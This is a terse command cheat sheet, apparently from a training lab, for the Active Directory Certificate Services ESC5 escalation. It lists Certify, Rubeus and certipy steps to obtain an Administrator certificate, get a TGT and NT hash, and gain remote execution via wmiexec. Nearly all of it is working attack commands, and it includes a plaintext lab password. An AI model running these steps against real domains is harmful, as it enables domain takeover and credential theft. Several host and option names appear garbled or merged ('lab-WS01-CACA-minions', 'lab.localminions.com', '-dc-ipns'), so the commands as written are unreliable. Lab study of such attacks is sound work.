ESC5
Vulnerable PKI Object Access Control
Windows
Request a Certificate using SubCA template
PS /home/bobbuilder> .\Certify.exe request /ca:WS01.DC.minions.com\lab-WS01-CACA-minions /template:SubCA<template name> /altname:Administrator
Download Pending Request
PS /home/bobbuilder> .\Certify.exe download /ca:WS01.lab.local\lab-WS01-CADC.minions.com\CA-minions /id:10
Convert pem to pfx
openssl pkcs12 -in approved.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out approved.pfx
Request the TGT and the NT Hash
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials
Linux
SSH Port Forwarding
ssh -N -f -D 127.0.0.1:9050 htb-student@<ip>
Request a certificate as the Domain Administrator
bob$ certipy req -u ckenuser1 -p Superman001password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca lab-WS01-CACA-minions -template SubCA<template name> -upn Administrator
Issue the requested certificate
We approve the previous request by specifying the request ID 10
with the option -issue-request 10
bob$ certipy ca -u ckenuser1 -p Superman001password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca lab-WS01-CACA-minions -issue-request 10
Retrieve the issueissued certificate
We can retrieve the certificate with the option -retrieve 10
bob$ certipy req -u ckenuser1 -p Superman001password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca lab-WS01-CACA-minions -retrieve 10
Authenticate with the Administrator Certificate
bob$ certipy auth -pfx administrator.pfx -username administrator -domain lab.localminions.com -dc-ip <ip>
Execute wmiexec with proxychains a TGT
KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL -dc-ipns <ip> -dns-tcp